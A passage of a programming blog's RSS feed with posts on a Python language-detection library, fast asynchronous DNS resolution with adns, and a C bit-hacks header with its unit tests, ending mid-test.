Output:

Failed translating: invalid text
</pre>
<p>The &#8220;<strong>LanguageDetector</strong>&#8221; class can be used to detect the language of the text. It contains a function called &#8220;<strong>detect</strong>&#8220;.</p>
<p>The &#8220;detect&#8221; function takes only one argument - <strong>message</strong> - the piece of text you to detect language of.</p>
<p>It returns a &#8220;<strong>Language</strong>&#8221; object that has four properties:</p>
<ul>
<li><strong>lang_code</strong> - two letter language code for the given language. For example &#8220;ru&#8221; for Russian.</li>
<li><strong>lang</strong> - the name of the language. For example, &#8220;Russian&#8221;.</li>
<li><strong>confidence</strong> - the confidence level from 0.0 to 1.0 that describes how confident the detector was about the language of the given text.</li>
<li><strong>is_reliable</strong> - was the detection reliable.</li>
</ul>
<p>Here is an example of &#8220;LanguageDetector&#8221;:</p>
<pre>
>>> from xgoogle.translate import LanguageDetector, DetectionError
>>>
>>> detect = LanguageDetector().detect
>>> english = detect("This is a wonderful library.")
>>> english.lang_code
'en'
>>> english.lang
'English'
>>> english.confidence
0.28078437000000001
>>> english.is_reliable
True
</pre>
<p>In case of a failure &#8220;detect&#8221; raises a &#8220;<strong>DetectionError</strong>&#8221; exception.</p>
<p>These two classes interact with the <a href="http://code.google.com/apis/ajaxlanguage/">Google Ajax Language API</a> to do their job. Since this Ajax service returns <a href="http://json.org/">JSON</a> string, you&#8217;ll need to install simplejson Python module. It should be as easy as typing &#8220;easy_install simplejson&#8221;.</p>
<div class="download">
<div class="download-title">Download &#8220;<strong>xgoogle</strong>&#8221; library:</div>
<p>Download: <a href="http://www.catonmat.net/download/xgoogle.zip" title="Version 1.3 downloaded 2788 times" rel="enclosure">xgoogle library (.zip)</a><br />
Downloaded: 2788 times.<br />
Download url: http://www.catonmat.net/download/xgoogle.zip
</p></div>
<p>I haven&#8217;t yet posted this library to <a href="http://pypi.python.org/pypi">pypi</a> but I will soon do it.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=B6OzK59Xt4E:2h_CU55jyns:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=B6OzK59Xt4E:2h_CU55jyns:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=B6OzK59Xt4E:2h_CU55jyns:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=B6OzK59Xt4E:2h_CU55jyns:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=B6OzK59Xt4E:2h_CU55jyns:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=B6OzK59Xt4E:2h_CU55jyns:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=B6OzK59Xt4E:2h_CU55jyns:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/B6OzK59Xt4E" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/python-library-for-google-translate/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/python-library-for-google-translate/</feedburner:origLink></item>
		<item>
		<title>Resolving DNS Asynchronously</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/ddJlA6MyMhQ/</link>
		<comments>http://www.catonmat.net/blog/asynchronous-dns-resolution/#comments</comments>
		<pubDate>Thu, 17 Sep 2009 15:15:37 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Programming]]></category>
<category>adns</category><category>asynchronous</category><category>dns</category><category>gethostbyname</category><category>python</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/asynchronous-dns-resolution/</guid>
		<description><![CDATA[Once upon a time, I had to quickly resolve thousands of DNS names. My first solution was to call gethostbyname repeatedly for each of the hosts. This turned out to be extremely slow. I could only do 200 hosts in a minute. I talked with someone and he suggested to try to do it asynchronously. [...]]]></description>
			<content:encoded><![CDATA[<p><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/09/asynchronous-dns.jpg' alt='Asynchronous DNS' class="post-icon" align="left" />Once upon a time, I had to quickly resolve thousands of DNS names. My first solution was to call <a href="http://linux.die.net/man/3/gethostbyname">gethostbyname</a> repeatedly for each of the hosts. This turned out to be extremely slow. I could only do 200 hosts in a minute. I talked with someone and he suggested to try to do it asynchronously. I looked around and found <a href="http://www.chiark.greenend.org.uk/~ian/adns/">adns</a> - asynchronous dns library. Since I was writing the code in Python, I looked around some more and found <a href="http://code.google.com/p/adns-python/">Python bindings for adns</a>. I tried adns and - wow - I could do <strong>20000 hosts in a minute</strong>!</p>
<p>In this post I want to share the slow code and the fast asynchronous code. The slow code is only useful if you need to resolve just several domains. The asynchronous code is much more useful. I made it as a Python module so that you can reuse it. It&#8217;s called &#8220;<a href="http://www.catonmat.net/download/async_dns.py">async_dns.py</a>&#8221; and an example of how to use it is included at the bottom of the post.</p>
<p>Here is the slow code that uses gethostbyname. The only reusable part of this code is &#8220;<strong>resolve_slow</strong>&#8221; function that takes a list of hosts to resolve, resolves them, and returns a dictionary containing { host: ip } pairs.</p>
<p>To measure how fast it is I made it resolve hosts &#8220;www.domain0.com&#8221;, &#8220;www.domain1.com&#8221;, &#8230;, &#8220;www.domain999.com&#8221; and print out how long the whole process took.</p>
<pre>
#!/usr/bin/python

import socket
from time import time

def resolve_slow(hosts):
    """
    Given a list of hosts, resolves them and returns a dictionary
    containing {'host': 'ip'}.
    If resolution for a host failed, 'ip' is None.
    """
    resolved_hosts = {}
    for host in hosts:
        try:
            host_info = socket.gethostbyname(host)
            resolved_hosts[host] = host_info
        except socket.gaierror, err:
            resolved_hosts[host] = None
    return resolved_hosts

if __name__ == "__main__":
    host_format = "www.domain%d.com"
    number_of_hosts = 1000

    hosts = [host_format % i for i in range(number_of_hosts)]

    start = time()
    resolved_hosts = resolve_slow(hosts)
    end = time()

    print "It took %.2f seconds to resolve %d hosts." % (end-start, number_of_hosts)
</pre>
<p>And here is the fast code that uses adns. I created a class &#8220;<strong>AsyncResolver</strong>&#8221; that can be reused if you import it from this code. Just like &#8220;<strong>resolve_slow</strong>&#8221; from the previous code example, it takes a list of hosts to resolve and returns a dictionary of { host: ip } pairs.</p>
<p>If you run this code, it will print out how long it took to resolve 20000 hosts.</p>
<pre>
#!/usr/bin/python
#

import adns
from time import time

class AsyncResolver(object):
    def __init__(self, hosts, intensity=100):
        """
        hosts: a list of hosts to resolve
        intensity: how many hosts to resolve at once
        """
        self.hosts = hosts
        self.intensity = intensity
        self.adns = adns.init()

    def resolve(self):
        """ Resolves hosts and returns a dictionary of { 'host': 'ip' }. """
        resolved_hosts = {}
        active_queries = {}
        host_queue = self.hosts[:]

        def collect_results():
            for query in self.adns.completed():
                answer = query.check()
                host = active_queries[query]
                del active_queries[query]
                if answer[0] == 0:
                    ip = answer[3][0]
                    resolved_hosts[host] = ip
                elif answer[0] == 101: # CNAME
                    query = self.adns.submit(answer[1], adns.rr.A)
                    active_queries[query] = host
                else:
                    resolved_hosts[host] = None

        def finished_resolving():
            return len(resolved_hosts) == len(self.hosts)

        while not finished_resolving():
            while host_queue and len(active_queries) < self.intensity:
                host = host_queue.pop()
                query = self.adns.submit(host, adns.rr.A)
                active_queries[query] = host
            collect_results()

        return resolved_hosts

if __name__ == "__main__":
    host_format = "www.host%d.com"
    number_of_hosts = 20000

    hosts = [host_format % i for i in range(number_of_hosts)]

    ar = AsyncResolver(hosts, intensity=500)
    start = time()
    resolved_hosts = ar.resolve()
    end = time()

    print "It took %.2f seconds to resolve %d hosts." % (end-start, number_of_hosts)
</pre>
<p>I wrote it in a manner that makes it reusable in other programs. Here is an example of how to reuse this code:</p>
<pre>
from async_dns import AsyncResolver

ar = AsyncResolver(["www.google.com", "www.reddit.com", "www.nonexistz.net"])
resolved = ar.resolve()

for host, ip in resolved.items():
  if ip is None:
    print "%s could not be resolved." % host
  else:
    print "%s resolved to %s" % (host, ip)
</pre>
<p>Output:</p>
<pre>
www.nonexistz.net could not be resolved.
www.reddit.com resolved to 159.148.86.207
www.google.com resolved to 74.125.39.99
</pre>
<div class="download">
<div class="download-title">Download &#8220;<strong>async_dns.py</strong>&#8220;:</div>
<p>Download: <a href="http://www.catonmat.net/download/async_dns.py" title="Version v1.0 downloaded 312 times" rel="enclosure">async_dns.py</a><br />
Downloaded: 312 times.<br />
Download url: http://www.catonmat.net/download/async_dns.py</p>
</div>
<p>I hope someone finds this useful!</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=ddJlA6MyMhQ:iclfc-adDpI:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=ddJlA6MyMhQ:iclfc-adDpI:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=ddJlA6MyMhQ:iclfc-adDpI:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=ddJlA6MyMhQ:iclfc-adDpI:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=ddJlA6MyMhQ:iclfc-adDpI:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=ddJlA6MyMhQ:iclfc-adDpI:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=ddJlA6MyMhQ:iclfc-adDpI:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/ddJlA6MyMhQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/asynchronous-dns-resolution/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/asynchronous-dns-resolution/</feedburner:origLink></item>
		<item>
		<title>bithacks.h - bit hacks header file</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/H_sH2aHLrFU/</link>
		<comments>http://www.catonmat.net/blog/bit-hacks-header-file/#comments</comments>
		<pubDate>Thu, 03 Sep 2009 04:40:29 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Programming]]></category>
<category>b16</category><category>b32</category><category>b8</category><category>bit hacks</category><category>bithacks.h</category><category>c</category><category>macros</category><category>tom torfs</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/bit-hacks-header-file/</guid>
		<description><![CDATA[A part of being a great programmer is having your personal code library. With a personal code library I mean a repository of code that you have an intimate knowledge of and that you can reuse quickly. If you are a C programmer, you don&#8217;t want to reimplement linked lists, trees, various utility functions, macros [...]]]></description>
			<content:encoded><![CDATA[<p><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/06/microcontroller-bit-hacks.jpg' alt='Bit Hacks' class="post-icon" align="left" />A part of being a great programmer is having your personal code library. With a personal code library I mean a repository of code that you have an intimate knowledge of and that you can reuse quickly. If you are a C programmer, you don&#8217;t want to reimplement linked lists, trees, various utility functions, macros and algorithms each time you write a new program. Rather you want to take them from your repository, adjust and incorporate in your code.</p>
<p>A good example is the implementation of <a href="http://lxr.linux.no/linux+v2.6.30/include/linux/list.h">linked lists</a> in the Linux kernel. Every kernel developer knows it and uses it if necessary. They wouldn&#8217;t reimplement it. Another example is all the code written by <a href="http://cr.yp.to/">djb</a>. It&#8217;s so good that people have taken it and turned into <a href="http://www.fefe.de/djb/">libdjb code library</a>.</p>
<p>With this article I&#8217;d like to open a new topic in this blog where I share code from my personal code library. I&#8217;ll start with a C header file that I created just recently based on my <a href="http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/">Bit Hacks You Should Know About</a> article.</p>
<p>This header file is called &#8220;<a href="http://www.catonmat.net/download/bithacks.h" title="Version v1.0 downloaded 876 times" rel="enclosure">bithacks.h</a>&#8221; and it contains various macros for bit manipulations. I also wrote tests for all the macros in the &#8220;<a href="http://www.catonmat.net/download/bithacks-test.c" title="Version v1.0 downloaded 583 times" rel="enclosure">bithacks-test.c</a>&#8221; program.</p>
<p>The most beautiful part of &#8220;bithacks.h&#8221; is the &#8220;<strong>B8</strong>&#8221; macro that allows to write something like &#8221; x = B8(10101010) &#8221; and turns it into &#8221; x = 170 &#8221; (because 10101010 in binary is 170 in decimal). I have not yet added B16 and B32 macros but I will add them when I publish the article on advanced bithacks. The credit for the B8 idea goes to <a href="http://cprog.tomsweb.net/">Tom Torfs</a> who was the first to write it.</p>
<p>The &#8220;bithacks.h&#8221; header provides the following macros:</p>
<ul>
<li><strong>B8(x)</strong> - turns x written in binary into decimal,</li>
<li><strong>B_EVEN(x)</strong> - tests if x is even (<a href="http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/#bithack1">bithack #1</a>),</li>
<li><strong>B_ODD(x)</strong> - tests if x is odd (!(<a href="http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/#bithack1">bithack #1</a>)),</li>
<li><strong>B_IS_SET(x, n)</strong> - tests if n-th bit is set in x (<a href="http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/#bithack3">bithack #2</a>),</li>
<li><strong>B_SET(x, n)</strong> - sets n-th bit in x (<a href="http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/#bithack3">bithack #3</a>),</li>
<li><strong>B_UNSET(x, n)</strong> - unsets n-th bit in x (<a href="http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/#bithack4">bithack #4</a>),</li>
<li><strong>B_TOGGLE(x, n)</strong> - toggles n-th bit in x (<a href="http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/#bithack5">bithack #5</a>),</li>
<li><strong>B_TURNOFF_1(x)</strong> - turns off the right-most 1-bit in x (<a href="http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/#bithack6">bithack #6</a>),</li>
<li><strong>B_ISOLATE_1(x)</strong> - isolates the right-most 1-bit in x (<a href="http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/#bithack7">bithack #7</a>),</li>
<li><strong>B_PROPAGATE_1(x)</strong> - propagates the right-most 1-bit in x (<a href="http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/#bithack8">bithack #8</a>),</li>
<li><strong>B_ISOLATE_0(x)</strong> - isolates the right-most 0-bit in x (<a href="http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/#bithack9">bithack #9</a>),</li>
<li><strong>B_TURNON_0(x)</strong> - turn on the right-most 0-bit in x (<a href="http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/#bithack10">bithack #10</a>).</li>
</ul>
<p>Please see &#8220;<a href="http://www.catonmat.net/download/bithacks-test.c" title="Version v1.0 downloaded 583 times" rel="enclosure">bithacks-test.c</a>&#8221; for many examples of these macros.</p>
<p>For those who don&#8217;t want to download bithacks.h, here is its content:</p>
<pre>
/*
** bithacks.h - bit hacks macros. v1.0
**
** Released under the MIT license.
*/

#ifndef BITHACKS_H
#define BITHACKS_H

#define HEXIFY(X) 0x##X##LU

#define B8IFY(Y) (((Y&#038;0x0000000FLU)?1:0)  + \
                  ((Y&#038;0x000000F0LU)?2:0)  + \
                  ((Y&#038;0x00000F00LU)?4:0)  + \
                  ((Y&#038;0x0000F000LU)?8:0)  + \
                  ((Y&#038;0x000F0000LU)?16:0) + \
                  ((Y&#038;0x00F00000LU)?32:0) + \
                  ((Y&#038;0x0F000000LU)?64:0) + \
                  ((Y&#038;0xF0000000LU)?128:0))

#define B8(Z) ((unsigned char)B8IFY(HEXIFY(Z)))

/* test if x is even */
#define B_EVEN(x)        (((x)&#038;1)==0)

/* test if x is odd */
#define B_ODD(x)         (!B_EVEN((x)))

/* test if n-th bit in x is set */
#define B_IS_SET(x, n)   (((x) &#038; (1&lt;&lt;(n)))?1:0)

/* set n-th bit in x */
#define B_SET(x, n)      ((x) |= (1&lt;&lt;(n)))

/* unset n-th bit in x */
#define B_UNSET(x, n)    ((x) &#038;= ~(1&lt;&lt;(n)))

/* toggle n-th bit in x */
#define B_TOGGLE(x, n)   ((x) ^= (1&lt;&lt;(n)))

/* turn off right-most 1-bit in x */
#define B_TURNOFF_1(x)   ((x) &#038;= ((x)-1))

/* isolate right-most 1-bit in x */
#define B_ISOLATE_1(x)   ((x) &#038;= (-(x)))

/* right-propagate right-most 1-bit in x */
#define B_PROPAGATE_1(x) ((x) |= ((x)-1))

/* isolate right-most 0-bit in x */
#define B_ISOLATE_0(x)   ((x) = ~(x) &#038; ((x)+1))

/* turn on right-most 0-bit in x */
#define B_TURNON_0(x)    ((x) |= ((x)+1))

/*
** more bit hacks coming as soon as I post
** an article on advanced bit hacks
*/

#endif
</pre>
<p>And here are all the tests:</p>
<pre class="lotsocode">
/*
** bithacks-test.c - tests for bithacks.h
**
** Released under the MIT license.
*/

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;

#include &#34;bithacks.h&#34;

int error_count;

#define TEST_OK(exp, what) do { \
    if ((exp)!=(what)) { \
        error_count++; \
        printf(&#34;Test &#39;%s&#39; at line %d failed.\n&#34;, #exp, __LINE__); \
    } } while(0)

#define TEST_END do { \
    if (error_count) { \
        printf(&#34;Testing failed: %d failed tests.\n&#34;, error_count); \
    } else { \
        printf(&#34;All tests OK.\n&#34;); \
    } } while (0)

void test_B8()
{
    /* test B8 */
    TEST_OK(B8(0), 0);
    TEST_OK(B8(1), 1);
    TEST_OK(B8(11), 3);
    TEST_OK(B8(111), 7);
    TEST_OK(B8(1111), 15);
    TEST_OK(B8(11111), 31);
    TEST_OK(B8(111111), 63);
    TEST_OK(B8(1111111), 127);
    TEST_OK(B8(00000000), 0);
    TEST_OK(B8(11111111), 255);
    TEST_OK(B8(1010), 10);
    TEST_OK(B8(10101010), 170);
    TEST_OK(B8(01010101), 85);
}

void test_B_EVEN()
{
    /* test B_EVEN */
    TEST_OK(B_EVEN(B8(0)), 1);
    TEST_OK(B_EVEN(B8(00000000)), 1);
    TEST_OK(B_EVEN(B8(1)), 0);
    TEST_OK(B_EVEN(B8(11111111)), 0);
    TEST_OK(B_EVEN(B8(10101010)), 1);
    TEST_OK(B_EVEN(B8(01010101)), 0);
    TEST_OK(B_EVEN(44), 1);
    TEST_OK(B_EVEN(131), 0);
}

void test_B_ODD()
{
    /* test B_ODD */
    TEST_OK(B_ODD(B8(0)), 0);
    TEST_OK(B_ODD(B8(00000000)), 0);
    TEST_OK(B_ODD(B8(1)), 1);
    TEST_OK(B_ODD(B8(11111111)), 1);
    TEST_OK(B_ODD(B8(10101010)), 0);
    TEST_OK(B_ODD(B8(01010101)), 1);
    TEST_OK(B_ODD(44), 0);
    TEST_OK(B_ODD(131), 1);
}

void test_B_IS_SET()
{
    /* test B_IS_SET */
    TEST_OK(B_IS_SET(B8(0), 0), 0);
    TEST_OK(B_IS_SET(B8(00000000), 0), 0);
    TEST_OK(B_IS_SET(B8(1), 0), 1);
    TEST_OK(B_IS_SET(B8(11111111), 0), 1);
    TEST_OK(B_IS_SET(B8(11111111), 1), 1);
    TEST_OK(B_IS_SET(B8(11111111), 2), 1);
    TEST_OK(B_IS_SET(B8(11111111), 3), 1);
    TEST_OK(B_IS_SET(B8(11111111), 4), 1);
    TEST_OK(B_IS_SET(B8(11111111), 5), 1);
    TEST_OK(B_IS_SET(B8(11111111), 6), 1);
    TEST_OK(B_IS_SET(B8(11111111), 7), 1);
    TEST_OK(B_IS_SET(B8(11110000), 0), 0);
    TEST_OK(B_IS_SET(B8(11110000), 1), 0);
    TEST_OK(B_IS_SET(B8(11110000), 2), 0);
    TEST_OK(B_IS_SET(B8(11110000), 3), 0);
    TEST_OK(B_IS_SET(B8(11110000), 4), 1);
    TEST_OK(B_IS_SET(B8(11110000), 5), 1);
    TEST_OK(B_IS_SET(B8(11110000), 6), 1);
    TEST_OK(B_IS_SET(B8(11110000), 7), 1);
    TEST_OK(B_IS_SET(B8(00001111), 0), 1);
    TEST_OK(B_IS_SET(B8(00001111), 1), 1);
    TEST_OK(B_IS_SET(B8(00001111), 2), 1);
    TEST_OK(B_IS_SET(B8(00001111), 3), 1);
    TEST_OK(B_IS_SET(B8(00001111), 4), 0);
    TEST_OK(B_IS_SET(B8(00001111), 5), 0);
    TEST_OK(B_IS_SET(B8(00001111), 6), 0);
    TEST_OK(B_IS_SET(B8(00001111), 7), 0);
    TEST_OK(B_IS_SET(B8(10101010), 0), 0);
    TEST_OK(B_IS_SET(B8(10101010), 1), 1);
    TEST_OK(B_IS_SET(B8(10101010), 2), 0);
    TEST_OK(B_IS_SET(B8(10101010), 3), 1);
    TEST_OK(B_IS_SET(B8(10101010), 4), 0);
    TEST_OK(B_IS_SET(B8(10101010), 5), 1);
    TEST_OK(B_IS_SET(B8(10101010), 6), 0);
    TEST_OK(B_IS_SET(B8(10101010), 7), 1);
    TEST_OK(B_IS_SET(B8(01010101), 0), 1);
    TEST_OK(B_IS_SET(B8(01010101), 1), 0);
    TEST_OK(B_IS_SET(B8(01010101), 2), 1);
    TEST_OK(B_IS_SET(B8(01010101), 3), 0);
    TEST_OK(B_IS_SET(B8(01010101), 4), 1);
    TEST_OK(B_IS_SET(B8(01010101), 5), 0);
    TEST_OK(B_IS_SET(B8(01010101), 6), 1);
    TEST_OK(B_IS_SET(B8(01010101), 7), 0);
}

void test_B_SET()
{
    /* test B_SET */
    unsigned char x;

    x = B8(00000000);
    TEST_OK(B_SET(x, 0), B8(00000001));
    TEST_OK(B_SET(x, 1), B8(00000011));
    TEST_OK(B_SET(x, 2), B8(00000111));
    TEST_OK(B_SET(x, 3), B8(00001111));
    TEST_OK(B_SET(x, 4), B8(00011111));
    TEST_OK(B_SET(x, 5), B8(00111111));
    TEST_OK(B_SET(x, 6), B8(01111111));
    TEST_OK(B_SET(x, 7), B8(11111111));

    x = B8(11111111);
    TEST_OK(B_SET(x, 0), B8(11111111));
    TEST_OK(B_SET(x, 1), B8(11111111));
    TEST_OK(B_SET(x, 2), B8(11111111));
    TEST_OK(B_SET(x, 3), B8(11111111));
    TEST_OK(B_SET(x, 4), B8(11111111));
    TEST_OK(B_SET(x, 5), B8(11111111));
    TEST_OK(B_SET(x, 6), B8(11111111));
    TEST_OK(B_SET(x, 7), B8(11111111));
}

void test_B_UNSET()
{
    unsigned char x;

    x = B8(11111111);
    TEST_OK(B_UNSET(x, 0), B8(11111110));
    TEST_OK(B_UNSET(x, 1), B8(11111100));
    TEST_OK(B_UNSET(x, 2), B8(11111000));
    TEST_OK(B_UNSET(x, 3), B8(11110000));
    TEST_OK(B_UNSET(x, 4), B8(11100000));
    TEST_OK(B_UNSET(x, 5), B8(11000000));
    TEST_OK(B_UNSET(x, 6), B8(10000000));
    TEST_OK(B_UNSET(x, 7), B8(00000000));

    x = B8(00000000);
    TEST_OK(B_UNSET(x, 0), B8(00000000));
    TEST_OK(B_UNSET(x, 1), B8(00000000));
    TEST_OK(B_UNSET(x, 2), B8(00000000));
    TEST_OK(B_UNSET(x, 3), B8(00000000));
    TEST_OK(B_UNSET(x, 4), B8(00000000));
    TEST_OK(B_UNSET(x, 5), B8(00000000));
    TEST_OK(B_UNSET(x, 6), B8(00000000));
    TEST_OK(B_UNSET(x, 7), B8(00000000));
}

void test_B_TOGGLE()
{
    unsigned char x = B8(11111111);
    TEST_OK(B_TOGGLE(x, 0), B8(11111110));
    TEST_OK(B_TOGGLE(x, 0), B8(11111111));
    TEST_OK(B_TOGGLE(x, 1), B8(11111101));
    TEST_OK(B_TOGGLE(x, 1), B8(11111111));
    TEST_OK(B_TOGGLE(x, 2), B8(11111011));
    TEST_OK(B_TOGGLE(x, 2), B8(11111111));
    TEST_OK(B_TOGGLE(x, 3), B8(11110111));
    TEST_OK(B_TOGGLE(x, 3), B8(11111111));
    TEST_OK(B_TOGGLE(x, 4), B8(11101111));
    TEST_OK(B_TOGGLE(x, 4), B8(11111111));
    TEST_OK(B_TOGGLE(x, 5), B8(11011111));
    TEST_OK(B_TOGGLE(x, 5), B8(11111111));
    TEST_OK(B_TOGGLE(x, 6), B8(10111111));
    TEST_OK(B_TOGGLE(x, 6), B8(11111111));
    TEST_OK(B_TOGGLE(x, 7), B8(01111111));
    TEST_OK(B_TOGGLE(x, 7), B8(11111111));
}

void test_B_TURNOFF_1()
{
    unsigned char x;

    x = B8(11111111);
    TEST_OK(B_TURNOFF_1(x), B8(11111110));
    TEST_OK(B_TURNOFF_1(x), B8(11111100));
    TEST_OK(B_TURNOFF_1(x), B8(11111000));
    TEST_OK(B_TURNOFF_1(x), B8(11110000));
    TEST_OK(B_TURNOFF_1(x), B8(11100000));
    TEST_OK(B_TURNOFF_1(x), B8(11000000));
    TEST_OK(B_TURNOFF_1(x), B8(10000000));
    TEST_OK(B_TURNOFF_1(x), B8(00000000));
    TEST_OK(B_TURNOFF_1(x), B8(00000000));

    x = B8(10101010);
    TEST_OK(B_TURNOFF_1(x), B8(10101000));
    TEST_OK(B_TURNOFF_1(x), B8(10100000));
    TEST_OK(B_TURNOFF_1(x), B8(10000000));
    TEST_OK(B_TURNOFF_1(x), B8(00000000));
    TEST_OK(B_TURNOFF_1(x), B8(00000000));

    x = B8(01010101);
    TEST_OK(B_TURNOFF_1(x), B8(01010100));
    TEST_OK(B_TURNOFF_1(x), B8(01010000));
    TEST_OK(B_TURNOFF_1(x), B8(01000000));
    TEST_OK(B_TURNOFF_1(x), B8(00000000));
    TEST_OK(B_TURNOFF_1(x), B8(00000000));
}

void test_B_ISOLATE_1()
{
    unsigned char x;

    x = B8(11111111);
    TEST_OK(B_ISOLATE_1(x), B8(00000001));
    TEST_OK(B_ISOLATE_1(x), B8(00000001));

    x = B8(11111110);
    TEST_OK(B_ISOLATE_1(x), B8(00000010));
    TEST_OK(B_ISOLATE_1(x), B8(00000010));

    x = B8(11111100);
    TEST_OK(B_ISOLATE_1(x), B8(00000100));
    TEST_OK(B_ISOLATE_1(x), B8(00000100));

    x = B8(11111000);
    TEST_OK(B_ISOLATE_1(x), B8(00001000));
    TEST_OK(B_ISOLATE_1(x), B8(00001000));

    x = B8(11110000);
    TEST_OK(B_ISOLATE_1(x), B8(00010000));
    TEST_OK(B_ISOLATE_1(x), B8(00010000));

    x = B8(11100000);
    TEST_OK(B_ISOLATE_1(x), B8(00100000));
    TEST_OK(B_ISOLATE_1(x), B8(00100000));

    x = B8(11000000);
    TEST_OK(B_ISOLATE_1(x), B8(01000000));
    TEST_OK(B_ISOLATE_1(x), B8(01000000));

    x = B8(10000000);
    TEST_OK(B_ISOLATE_1(x), B8(10000000));
    TEST_OK(B_ISOLATE_1(x), B8(10000000));

    x = B8(00000000);
    TEST_OK(B_ISOLATE_1(x), B8(00000000));

    x = B8(10000000);
    TEST_OK(B_ISOLATE_1(x), B8(10000000));

    x = B8(10001001);
    TEST_OK(B_ISOLATE_1(x), B8(00000001));

    x = B8(10001000);
    TEST_OK(B_ISOLATE_1(x), B8(00001000));
}

void test_B_PROPAGATE_1()
{
    unsigned char x;

    x = B8(00000000);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(10000000);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(11000000);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(11100000);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(11110000);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(11111000);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(11111100);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(11111110);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(11111111);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(00100000);
    TEST_OK(B_PROPAGATE_1(x), B8(00111111));
    TEST_OK(B_PROPAGATE_1(x), B8(00111111));

    x = B8(10101000);
    TEST_OK(B_PROPAGATE_1(x), B8(10101111));
    TEST_OK(B_PROPAGATE_1(x), B8(10101111));

    x = B8(10101010);
    TEST_OK(B_PROPAGATE_1(x), B8(10101011));
    TEST_OK(B_PROPAGATE_1(x), B8(10101011));

    x = B8(10101010);
    TEST_OK(B_PROPAGATE_1(x), B8(10101011));
    TEST_OK(B_PROPAGATE_1(x), B8(10101011));
}

void test_B_ISOLATE_0()
{
    unsigned char x;

    x = B8(00000000);
    TEST_OK(B_ISOLATE_0(x), B8(00000001));
    TEST_OK(B_ISOLATE_0(x), B8(00000010));
    TEST_OK(B_ISOLATE_0(x), B8(00000001));

    x = B8(00000011);
    TEST_OK(B_ISOLATE_0(x), B8(00000100));
    TEST_OK(B_ISOLATE_0(x), B8(00000001));

    x = B8(00000111);
    TEST_OK(B_ISOLATE_0(x), B8(00001000));
    TEST_OK(B_ISOLATE_0(x), B8(00000001));

    x = B8(00001111);
    TEST_OK(B_ISOLATE_0(x), B8(00010000));
    TEST_OK(B_ISOLATE_0(x), B8(00000001));

    x = B8(00011111);
    TEST_OK(B_ISOLATE_0(x), B8(00100000));
    TEST_OK(B_ISOLATE_0(x), B8(00000001));

    x = B8(00111111);
    TEST_OK(B_ISOLATE_0(x), B8(01000000));
    TEST_OK(B_ISOLATE_0(x), B8(00000001));

    x = B8(01111111);
    TEST_OK(B_ISOLATE_0(x), B8(10000000));
    TEST_OK(B_ISOLATE_0(x), B8(00000001));

    x = B8(11111111);
    TEST_OK(B_ISOLATE_0(x), B8(00000000));

    x = B8(01010101);
    TEST_OK(B_ISOLATE_0(x), B8(00000010));

    x = B8(01010111);
